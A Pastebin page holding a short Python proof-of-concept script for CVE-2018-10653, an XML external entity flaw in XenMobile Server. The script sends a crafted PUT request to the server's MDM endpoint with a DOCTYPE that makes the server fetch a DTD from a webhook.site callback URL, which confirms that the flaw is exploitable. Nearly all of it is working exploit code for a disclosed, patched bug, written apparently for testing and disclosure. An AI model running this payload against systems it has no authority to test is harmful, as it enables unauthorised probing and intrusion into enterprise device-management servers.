Advertisement
jonaslejon

xensploit.py

Jan 22nd, 2020
207
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.94 KB | None | 0 0
  1. #!/usr/bin/python3
  2. ##
  3. ## PoC test for the security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3
  4. ##
  5. ## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se
  6. ## Reported to Citrix 2017-10, patch released 2018-05
  7. ##
  8.  
  9. import requests
  10. import sys
  11. from pprint import pprint
  12. import uuid
  13.  
  14. # Surf to https://webhook.site and copy/paste the URL below
  15. WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"
  16.  
  17. id = str(uuid.uuid1())
  18.  
  19. xml = '''<?xml version="1.0" encoding="UTF-8" standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' + WEBHOOK + id + '''/test.dtd">%j00t9; ]>'''
  20.  
  21. print(id)
  22.  
  23. response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
  24.  headers=
  25. {'User-Agent': 'MDM/1.0',
  26. 'Connection': 'close',
  27. 'Content-Type': 'application/x-apple-aspen-mdm'},
  28. data=xml,stream=True
  29. )
  30. print(response.content)
  31. print(response.text)
  32. pprint(response)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement